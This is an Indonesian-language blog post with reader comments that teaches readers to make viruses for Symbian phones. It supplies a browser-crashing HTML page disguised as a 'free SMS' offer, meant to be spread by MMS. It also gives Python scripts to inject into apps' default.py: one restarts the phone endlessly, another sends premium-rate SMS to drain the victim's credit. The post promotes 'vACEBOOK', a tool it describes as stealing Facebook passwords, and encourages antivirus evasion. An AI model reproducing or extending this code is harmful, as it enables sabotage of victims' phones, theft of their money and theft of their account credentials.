Selasa, 25 Januari 2011

Symbianers


Demo Blog

vACEBOOK dan Virus Symbian dengan python

by The Symbianers on januari 25.2011, under ,
akhirnya aku menulis lagi….
Ini merupakan tulisan pertama saya di tahun 2011.
Syukur Alhamdulillah, aku tak menyangka akan menjadi pemenang pertama pada kontes blog yang di adakan oleh sahabat saya mba V3 di www.javagems.info , hanya ada satu kata untuk mba V3 dan semua teman-teman yang telah mendukung, “terimakasih banyak”.
Untuk mengabadikan momen yang bersejarah bagiku ini, karena merupakan hadiah pertama yang aku dapat lewat internet dari hasil karya tanganku sendiri, maka aku ambil gambarnya untuk dikenang suatu hari nanti karena aku tau uang ini akan habis dan suatu saat hanya akan tersisa kenangan,….(bukan bermaksud sombong atau pamer loh)

blog sederhana ini telah saya ubah lagi tampilannya agar tidak bosan, walaupun masih jelek!!
Dalam tulisan kali ini, aku telah membuat sebuah e-book. Ini Bukan e-book tentang membuat virus symbian dan e-book ini tak ada hubungannya dengan virus, e-book ini merupakan ebook yang berisi tentang paradigma harta…berhubung karena gambar diatas adalah gambar uang, maka supaya lebih semangat di awal tahun, maka silahkan baca e-book buatanku ini…
e-book ini berjudul “Pandangan Islam Terhadap Harta”, referensi ebook ini dari sebuah buletin yang pernah saya baca. Bagi yang suka bawakan ceramah jum’at juga bisa jadikan ebook ini sebagai referensi. Isi nya sich hanya ada 3 sub bagian yaitu:

Pertama, mengapa Islam menyuruh kita kaya, Kedua, mencari penjelasan tentang mengapa kita miskin. Dan Ketiga, bagaimana kita mulai merekonstruksi kehidupan financial kita.




Tulisan kali ini akan membahas bagaimana cara membuat virus symbian, tapi disini saya membahas cara membuat virus dengan menggunakan handphone symbian itu sendiri, jadi jangan harap teman-teman akan mendapatkan cara membuat virus commwarior atau Baselo atau cabir atau teman-teman virus lainnya karena sepengetahuan saya adalah bahwa varian virus tersebut di tulis dalam bahasa C++ dan di compile menjadi file exe ataupun file lainnya. Dan perlu diingat bahwa bahasa C++ tersebut tidak terintegrasi dengan handphone symbian kita. Jangan kecil hati dulu, memangnya cuma bahasa C++ ajah yang bisa buat virus?? Python juga bisa karena Python itu sendiri adalah keponakan dari saudara perempuan sepersusuan dari bahasa C++ itu sendiri., he..he..he.. bahasa susahnya adalah bahwa python adalah turunan C++.
Kalo orang awam mungkin akan bertanya apa sich itu python?? Python adalah sejenis hewan melata yang panjang dan tak punya kaki biasanya berwarna kuning hijau kecoklat-coklatan. Tapi disini kita bukan berbicara tentang hewan yang dimaksud melainkan adalah bahwa python itu merupakan sebuah bahasa tingkat tinggi yang di gunakan untuk membuat program pada komputer ataupun ponsel. Sedikit kembali ke sejarah bahwa penamaan python itu sendiri bukan berasal dari adopsi hewan melata yang di sebut ular python tetapi penamaan bahasa pemrograman ini di ambil pada saat Guido van Rossum dari Amsterdam Belanda yang tak lain adalah pembuat program tersebut sedang asyk menonton sebuah acara komedi di stasiun televisi BBC yang berjudul “Monty Python’s Flying Circus” sehingga saat itu juga menjadi inspirasi dari penamaan bahasa program yang di buatnya tersebut. Bahasa python ini pada awalnya dibuat untuk bahasa script tingkat tinggi pada system operasi terdistribusi Amoeba. Bahasa pemrograman ini menjadi umum digunakan untuk kalangan Engineer seluruh dunia dalam pembuatan perangkat lunaknya, jadi kenapa saya belajar bahasa python ini karena pada dasarnya saya adalah Calon Engineer juga.
seorang teman kita, yang intinya menyuruh saya untuk mencoba malwarenya, wah hebat benar nich orang sudah bisa buat malware, katanya sich buat malwarenya pake aplikasi Zntxhan, Dedit, dan SISboom. Dari aplikasinya aja dapat disimpulkan bahwa python lah yang berperan penting dalam pembuatan malware dari teman kita tersebut yang menyebut dirinya cybercrow team. Singkat cerita saya mengunjungi situs cybercrow tersebut yang alamatnya di www.glewo.wen.ru dan saya download malwarenya karena penasaran pengen di coba. Di situs tersebut mengatakan bahwa malwarenya di anggap sebagai permainan game, katanya jika mampu menaklukkan malware tersebut tanpa antivirus dan format ulang maka kita akan merasakan kenikmatan tersendiri. Menurut saya kata-kata yang digunakan menunjukkan kelemahan malware itu sendiri. Saat saya coba tes malware tersebut ternyata hanya terdiri dari sekumpulan virus beserta autoexec (autorun) yang di gabung-gabung menjadi satu packing!! Jadi kesimpulannya bahwa mereka tidak membuat virus melainkan hanya mengabungkan virus yang telah ada (biasa di sebut teknik virus fusion) dan virus tersebut sudah ada yang terbaca oleh antivirus! Cukup kreatif menurut saya tetapi mungkin masih perlu ditingkatkan lagi. Ini adalah sekedar masukan dari saya pribadi. Saya berharap cybercrow team bisa tetap berkarya membuat malware-malware yang lebih sempurna lagi dan tidak terbaca antivirus!! , saya setuju bahwa bermain dengan virus sangatlah menyenangkan tetapi lebih menarik lagi jika kita yang membuat virus baru dengan tangan sendiri.
Teman-teman semua, perlu kita ketahui bersama bahwa menjadi seorang virus writer adalah hal yang sangat sangat merugikan, kenapa? Karena akan ada orang-orang bodoh yang mengutuk kita akibat virus yang kita buat telah menyerang mereka, akan ada orang-orang rakus yang memanfaatkan virus-virus kita dalam pengembangan antivirus mereka supaya dapat keuntungan materi. Kita tidak akan dapat apa-apa dari membuat virus kecuali satu yaitu kenikmatan tak terdefenisikan. Bahkan ada diantara para programer pembuat antivirus lokal di indonesia yang sejatinya adalah pembuat virus juga.
Bagi virus maker yang sudah senior, mohon jangan ketawa jika virus yang saya tulis ini adalah virus rendahan! Karena saya juga sebenarnya sangat bodoh di bidang virus!!

Sekarang mari kita belajar membuat virus symbian.
Sebelum belajar membuat virus symbian, kita harus satukan pemikiran dan pemahaman kita tentang apa itu virus? menurut saya Virus adalah sejumlah file yang jika bekerja/aktif maka akan menimbulkan masalah yang tidak menyenangkan. Setelah tau apa itu virus maka kita beralih kepada tujuan penciptaan virus itu sendiri, tujuan di buatnya virus adalah untuk menemani si antivirus bermain petak umpet, jadi virus yang kita buat nantinya harus bisa lolos dari penglihatan antivirus apapun. Jangan meniru nenek moyang kita yang sudah lebih dahulu ketangkap antivirus! Berbicara nenek moyang maka kita berbicara tentang sejarah, ada yang tau tidak sejarah awal kemunculan virus symbian itu sendiri? Nah, Sejarah virus symbian itu berawal pada tahun 2004 yang lalu (aku masih SMA kelas satu), ketika itu ada istilah “nightmare (mimpi bururk)” , tepatnya pada malam jum’at tanggal 17 bulan juni 2004 muncul virus pertama yang dikenal dengan nama “Worm.cabir”, jenis virus pertama merupakan suku worm dari bangsa cabir. Kerjaanya sich cuman menggandakan diri ajah melalui bluetooth, namanya juga suku worm sukanya memperbanyak diri. Setelah kemunculanya maka para dewa symbian lainnya menciptakan suku-suku baru dari bangsa yang berbeda-beda sampai saat ini.
Wah kapan belajarnya nich???
Baiklah sekarang saatnya belajar membuat virus symbian! BismillahiRahmaniRahim…
Untuk membuat virus symbian diperlukan aplikasi pendukung, yaitu python beserta script shell dan module pack nya, x-plore versi 3 ke atas, antivirus yang terupdate hari ini. Jika aplikasi tersebut belum ada di handphone kamu, silahkan cari dulu di tante google karena saya tidak menyediakan semuanya disini berhubung karena saya malas upload (gara-gara server di unhas lagi down, maklum anak teknik emang suka perang teknologi)..
Script yang akan saya ajarkan adalah script yang memanfaatkan kegunaan handphone itu sendiri, tetapi dengan cara yang lebih jahil, perlu kita ketahui bahwa port atau pintu keluar masuk pada handphone symbian kita tidaklah banyak, yaitu bluetooth, InfraRed (kalo ada), SMS/MMS/eMail/Web, Telpon, MMC, USB Port. Jadi kita hanya akan bermain-main di seputaran pintu keluar masuk tersebut.

Membuat Virus sily.gen html wrapper
Pertama adalah membuat virus dengan code html, efeknya adalah untuk membuat aplikasi Browser Nokia menjadi tidak berfungsi, dan belakangan ini bisa membuat aplikasi TTPod rusak juga, virus ini masih bekerja sampai dengan N70. virus ini telah beredar tahun 2006 lalu saat saya masih mahasiswa baru (maba), dan pada tulisan ini saya akan ajarkan kepada teman-teman. Virus ini sendiri telah tertangkap basah oleh antivirus komputer seperti antivirus Avira menamakannya virus HTML/sily.gen (html script virus). Tapi kalo antivirus handphone aku belum pernah coba karena aku gak pake antivirus saat ini. Silahkan uji apakah antivirus handphone kamu bisa menangkap virus ini atau tidak?
Untuk membuatnya diperlukan aplikasi x-plore, sebagai contoh aku pake x-plore versi 3.1
Caranya buka aplikasi x-plore, (atau bisa juga pake aplikasi pembuat file html seperti notepad,dedit, systool dll), setelah terbuka pilih Menu – file - New text file


Stelah itu anda akan diminta untuk memberi nama file text tersebut, katakanlah namanya “virushtml.html”, ingat nama filenya harus berekstensi html (.html)
Setelah selesai, maka akan ada layar kosong berwarna putih tempat untuk menulis.
membuat virus pertama kita ini sangatlah simpel, bahkan mungkin teman-teman tidak percaya dengan kode yang saya berikan ini karena terlalu simpel, tetapi jika teman-teman tidak percaya silahkan tes sendiri dengan antivirus yang ada di komputer anda (antivirus lokal tak akan membaca script ini sebagai virus). Silahkan tulis code html berikut:

<html><head><title>free sms</title></head>
<body>
<script>
function crash()
{
alert('The Guardian Angel, virus writer by irham');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
var b = fill;
while (b.length <= 0x400000) b+=b;
}
</script>
SMS Free on click, silahkan click tombol dibawah untuk tau caranya!<br>
<input type='button' onClick='crash()' value='click'>
</body>
</html>

#hijau = silahkan di modifikasi sesuai selera
#merah = boleh di ganti tapi sebaiknya jangan he..he..he..he..

Setelah code diatas selesai di tulis maka saat nya kita simpan, caranya pilih menu file dan INGAT hilangkan tanda centang pada pilihan “Save as unicode” dan kemudian setelah tanda centangnya hilang barulah kita save/simpan. Sekali lagi INGAT hilangkan tanda centangnya sebelum di save!!!

Jika kebetulan anda sedang online menggunakan komputer yang mempunyai antivirus seperti avira, atau antivirus bukan buatan indonesia lainnya, silahkan uji coba sendiri dengan meng copy script diatas pada notepad dan save dengan format html.
Setelah dibuka, maka akan secara sederhana tampilannya seperti gambar dibawah, layaknya halaman web biasa!!! Jangan coba-coba untuk menekan tombol click ya? Kan tidak lucu kalo virus buatan sendiri malah makan tuannya!!

Terus bagaimana cara explorasinya? Ya bisa di kirim lewat MMS ke orang lain, bisa di gabungkan dengan aplikasi-aplikasi lain, atau scriptnya bisa di tulis di sebuah layanan wapsite gratis, atau tergantung dari ide-ide nakal temen-temen semua!! Aku sich tidak tanggung jawab atas segala kerusakan yang terjadi….
Lanjut…
Sekarang kita coba membuat membuat virus dengan bahasa python!!
Salah satu kelemahan aplikasi yang ditulis dengan bahasa python adalah selalu ada file “default.py”. isi dari file tersebut bisa hanya sekedar tulisan “import namascript” atau ada juga berisi code dengan struktur aplikasi itu sendiri. Artinya apa? bahwa semua aplikasi yang di tulis dengan bahasa python bisa disisipkan script code virus pada file default.py, dan lebih asyknya lagi bahwa file default.py ini tidak di compile, jadi sangat mudah untuk di manfaatkan.
Dengan kata lain teknik kita disini adalah teknik virus injector, seperti motor teknologi terbaru, virus juga bisa pake system injeksi loh! dengan menambah atau meng injeksikan kode virus kedalam semua file yang bernama “default.py”, artinya teknik virus ini aku resmikan dengan nama “Guardian Angel” (sambil memukul gong atau simbal tanda peresmian sebanyak 3x). Apa hubungannya??? Hubungannya gak ada sich tapi aku sementara lagi dengar lagu terbaru cinta laura yang judulnya Guardian Angel dan kebetulan aku suka lagu ini sehingga ambil inspirasi dari lagu cinta laura – Guardian Angel. sebaiknya dengar bareng-bareng sambil lanjut membaca tulisan saya ini sehingga fikiran kita semua fresh dan di penuhi dengan cinta laura (maklum saya fans berat cinta laura he..he..he..LEBAY MODE:ON), sadar donk ini bukan blog download mp3 gratis bang irham!!! Sk2gwdk (suka – suka gue donk)….huwa..huwa..huwa..huwa ?
Next….
Selain itu, aplikasi yang ditulis dengan bahasa python tidak dapat berjalan jika tidak ada script dan module pack dari python itu sendiri, artinya bahwa handphone symbian yang tidak memiliki script dan module pack python akan aman dari virus python itu sendiri. Kelemahan yang sungguh keterlaluan! Tapi kelemahan itu bisa kita tutupi dengan penggabungan script dan module beserta virus kita dalam satu paket sis. artinya kita membuat instalan dimana script dan module sudah di ikut sertakan didalamnya, tetapi ukuran file sis tentu akan semakin besar pula.
Saya hanya memberikan contoh script dasarnya saja mengingat aku lagi kelaparan saat menulis tulisan ini!!! Cara meginjeksi file default.py itu bisa menggunakan aplikasi x-plorer, dengan memilih file default.py kemudian tekan angka 8 atau lewat menu – edit

1. virus script restart handphone ( winker)

#Code ini akan membuat handphone restart sendiri
#created by irham, www.symbianers.co.cc

#virus name : winker

import appswitch

appswitch.kill_app(u’phone’)
#script selesai, handphone akan restart sendiri, simpel dan mematikan


Silahkan tulis code diatas pada file default.py dari aplikasi berbasis python yang teman-teman ingin injeksi, jika pada file default.py sudah ada tulisannya maka saya sarankan untuk di hapus semua dan di ganti dengan kode diatas, atau bisa juga tidak di hapus tetapi kode diatas di tulis pada awal baris. kalimat yang diawali dengan tanda pagar (#) adalah kalimat keterangan saja, kalimat yang didahului tanda pagar pada bahasa python tidak akan dibaca sebagai perintah, kata yang di dahului tanda pagar boleh tidak ditulis. Untuk membuat virus kita semakin indah maka kita gunakan jasa dari aplikasi AUTOEXEC, yaitu aplikasi yang mampu membuat sebuah aplikasi berjalan sendiri ketika handphone mulai menyala atau hidup, ini seperti autorun pada komputer. Jadi, begitu handphone terserang virus winker ini maka handphone tersebut akan restart melulu atau restart terus menerus, terus menerus, lagi dan lagi, selalu, tuh kan restart lagi.
2. virus script kirim sms ria (vREG)

#code ini buat bantu nguras pulsa bagi orang kaya yang gak bisa habisin pulsanya
#created by irham, www.symbianers.co.cc

#virus name : vREG
Import messaging,os

nm = 1

for I in range(nm):

print(‘sending sms… %d’ % (nm-i))
messaging.sms_send(u’9090’,u’REG RAMAL IRHAM’)
os.abort()

#script selesai, hape akan kirim sms Hiburan ke Dedi sang mentalis, biaya Rp.2000/sms


Format sms bisa diganti sesuai selera, jika ada yang lebih mahal juga boleh, atau bisa juga digunakan untuk sms transfer pulsa jika ada operator yang format kirim pulsanya dalam bentuk sms, bisa di tambahkan ke dalam Autoexec juga supaya setiap kali hape di nyalakan maka akan ngirim sms terus.

Mungkin cukup dua script python yang bisa saya berikan pada posting ini sebagai dasar, tetapi jangan anggap remeh ke dua script python tersebut. saya akan memberikan sebuah contoh aplikasi yang saya buat dengan penggabungan kedua script tersebut dengan sedikit modifikasi. Aplikasi tersebut saya beri nama vACEBOOK dimana fungsinya adalah untuk mendapatkan password akun facebook orang lain. Ada yang bilang hack password facebook, ada yang bilang crack password facebook, tapi menurut saya hack dan crack itu tidak sesimpel apa yang di fikirkan orang-orang. Dan aplikasi vACEBOOK ini entah bisa disebut aplikasi hack password atau entah bisa menyandang gelar aplikasi crack password facebook itu tergantung orang yang memakainya. Yang jelas aplikasi ini made in indonesia dan saya pastikan belum ada satu antivirus lokal pun yang membaca aplikasi vACEBOOK ini sebagai virus, malware atau spyware. Kalo antivirus internasional saya sudah tes pake AVIRA 10 dan AVAST 5 dan tak terdeteksi sebagi file yang berbahaya atau dengan kata lain masih aman dari mata antivirus. Atau mungkin aplikasi vACEBOOK ini belum layak di sebut spyware atau virus sehingga antivirus tak sudi untuk melirik aplikasi vACEBOOK ini sebagai file virus.

vACEBOOK 2010 opensource version

File : vacebook.sis
Name : vACEBOOK

Type : Mobile Python Aplication

Genre : ALL

Relase date : On March 27, 2010

Developer : symbianers™

Publisher : www.symbianers.co.cc

Programer and designer : IRHAM

MD5 : 80d01d172ab49e9ac35b6f855877d0dd

SHA1 : 39b35cf61b72bbd23f2b396e936b1bb5d4ac2055
SHA256: 7888c5ead3f7ed9fba8167ea4fe0217244ad311a04f9eba740fae9ca6f99e8e5
TrID : File type identification
EPOC/SymbianOS Installer (100.0%)
Compatible : test and work 98% in Symbian OS70/80/81 2nd with Python and module scriptshell


virus test:
Permalink: analisis/7888c5ead3f7ed9fba8167ea4fe0217244ad311a04f9eba740fae9ca6f99e8e5-1270028223

vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cdefault.py - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook.aif - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook.app - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook_caption.rsc - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook.html - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook.jpg - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook.py - OK
vACEBOOK.sis/E:\0x5csystem\0x5capps\0x5cvacebook\0x5cvacebook.rsc - OK
vACEBOOK.sis/dt - OK
vACEBOOK.sis/dt - OK




Aplikasi vACEBOOK ini sengaja aku buat dengan opensource version karena aku berharap agar aplikasi ini bisa di kembangkan dan di modifikasi secara bebas oleh para symbianers mania. Dengan opensource maka aplikasi ini mampu berkembang dan menjadi lebih baik lagi serta saya berharap bug-bug dari aplikasi vACEBOOK ini bisa di perbaiki dan disempurnakan lagi. Saya juga berharap nantinya agar aplikasi ini bisa di modifikasi dan di daur ulang sehingga tampilan, logo gambar, serta nama aplikasi ini bisa berubah total ke arah yg lebih sempurna lagi sehingga mampu bersaing dengan perkembangan antivirus saat ini mengingat tujuan kita adalah menciptakan virus-virus yang mampu lolos dari antivirus baik itu antivirus handphone maupun antivirus PC.
Berhubung karena aplikasi vACEBOOK ini mempunyai sisi negatif pada sebagian kalangan, maka link download aplikasi vACEBOOKnya tidak serta merta aku pasang di posting ini.
Karena posting kali ini adalah bersifat sharing dan pembelajaran, maka cara kerja serta cara modifikasi aplikasi vACEBOOK ini akan saya berikan kepada teman-teman semua. Saya telah membuat e-book tentang tutorial dari aplikasi vacebook ini. Didalam ebook itu nantinya akan berisi source code aplikasi vACEBOOK serta link download aplikasi vACEBOOK itu sendiri serta cara penggunaanya.

Silahkan download ebook “vACEBOOK tutorial”


2 komentar:

  1. mantaf bro ......sukses bro wat ente..

    BalasHapus
  2. waw sangat pintar tapi aku pemula boz jadi belum faham benar tentang Symbian , download vacebooknya tu gmn caranya bos?

    BalasHapus